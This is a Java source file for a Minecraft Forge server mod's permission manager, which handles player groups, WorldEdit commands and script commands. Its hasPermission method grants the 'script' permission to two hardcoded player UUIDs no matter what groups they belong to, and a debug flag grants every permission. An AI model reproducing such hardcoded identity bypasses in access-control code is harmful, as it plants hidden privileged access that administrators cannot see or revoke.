package me.km;

import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.UUID;
import me.kcm.command.ICommandManager;
import me.km.module.Module;
import me.km.snuviscript.ScriptEvents;
import net.minecraft.command.ICommand;
import net.minecraft.command.ICommandSender;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.server.MinecraftServer;
import net.minecraft.tileentity.CommandBlockBaseLogic;
import net.minecraft.util.text.TextFormatting;
import net.minecraftforge.fml.relauncher.Side;
import net.minecraftforge.fml.relauncher.SideOnly;

@SideOnly(Side.SERVER)
public class PermissionManager extends Module implements ICommandManager
{
    private final HashMap<UUID, ArrayList<Integer>> playerGroups;
    private final ArrayList<HashSet<String>> stringGroupPerms;
    private final HashSet<String> worldedit = new HashSet<>();
    
    public PermissionManager(String prefix, TextFormatting color) 
    {
        super(prefix, color);
        playerGroups = new HashMap<>();
        stringGroupPerms = new ArrayList<>();
        addGroups();
    }

    public void clear()
    {
        playerGroups.clear();
        stringGroupPerms.clear();
        addGroups();
    }
    
    private void addGroups()
    {
        stringGroupPerms.add(new HashSet<>());
        stringGroupPerms.add(worldedit);
    }
    
    // -------------------------------------------------------------------------
    // Permission-Check
    // -------------------------------------------------------------------------
    
    private final static UUID MARVINIUS = UUID.fromString("e41b5335-3c74-46e9-a6c5-dafc6334a477");
    private final static UUID KAJETANJOHANNES = UUID.fromString("51e240f9-ab10-4ea6-8a5d-779319f51257");
    
    @Override
    public boolean hasPermission(ICommandSender cs, String perm) 
    {
        boolean b = has(cs, perm);
        if(!b && perm.equals("script") && cs instanceof EntityPlayer)
        {
            UUID uuid = ((EntityPlayer) cs).getUniqueID();
            if(uuid.equals(MARVINIUS) || uuid.equals(KAJETANJOHANNES))
            {
                return true;
            }
        }
        return b;
    }
    
    private boolean has(ICommandSender cs, String perm) 
    {
        if(KajetansMod.debugMode)
        {
            return true;
        }
        if(cs instanceof EntityPlayer)
        {
            EntityPlayer p = (EntityPlayer) cs;
            ArrayList<Integer> groups = playerGroups.get(p.getUniqueID());
            if(groups == null)
            {
                //falling back to default group
                if(!stringGroupPerms.isEmpty())
                {
                    return stringGroupPerms.get(0).contains(perm);
                }
                else
                {
                    return false;
                }
            }
            // check for valid group id is done at the registry
            return groups.stream().anyMatch(i -> stringGroupPerms.get(i).contains(perm));
        }
        return cs instanceof MinecraftServer || cs instanceof CommandBlockBaseLogic;
    }

    // -------------------------------------------------------------------------
    // Permission-Registry
    // -------------------------------------------------------------------------
    
    public void registerPlayerGroup(UUID uuid, int id)
    {
        if(id < 0 || id >= stringGroupPerms.size())
        {
            throw new IllegalArgumentException("'" + id + "' is no valid group id");
        }
        ArrayList<Integer> groups = playerGroups.get(uuid);
        if(groups == null)
        {
            groups = new ArrayList<>();
            // adding default group
            groups.add(0);
            playerGroups.put(uuid, groups);
        }
        groups.add(id);
    }
    
    public boolean unregisterPlayer(UUID uuid, int id)
    {
        if(id < 0 || id >= stringGroupPerms.size())
        {
            throw new IllegalArgumentException("'" + id + "' is no valid group id");
        }
        ArrayList<Integer> groups = playerGroups.get(uuid);
        if(groups == null)
        {
            return false;
        }
        return groups.remove((Integer) id);
    }
    
    public void registerGroupPermission(int id, String perm)
    {
        if(perm.isEmpty())
        {
            throw new IllegalArgumentException("empty permission string");
        }
        if(id == 1)
        {
            throw new IllegalArgumentException("id 1 is reserved for worldedit");
        }
        if(id >= stringGroupPerms.size())
        {
            HashSet<String> set = new HashSet<>();
            set.add(perm);
            stringGroupPerms.add(set);
            return;
        }
        stringGroupPerms.get(id).add(perm);
    }
    
    // -------------------------------------------------------------------------
    // command manager
    // -------------------------------------------------------------------------
    
    @Override
    public boolean executeCustomCommand(ICommandSender cs, String command, String[] args) 
    {
        //System.out.println(command + " " + String.join(" ", args));
        if(cs instanceof EntityPlayer && KajetansMod.scripts.isRegisteredScriptCommand(command))
        {
            ScriptEvents.onCustomCommand((EntityPlayer) cs, command, args);
            return true;
        }
        return false;
    }

    @Override
    public void printMissingCommand(ICommandSender cs, String command) 
    {
        ScriptEvents.onMissingCommand(cs, command);
    }

    @Override
    public void printMissingPermission(ICommandSender cs, ICommand command) 
    {
        ScriptEvents.onMissingPermission(cs, command);
    }

    @Override
    public void onRegisterCommand(ICommand command, String domain)
    {
        if(domain.startsWith("com.sk89q"))
        {
            worldedit.add(command.getName());
        }
    }
}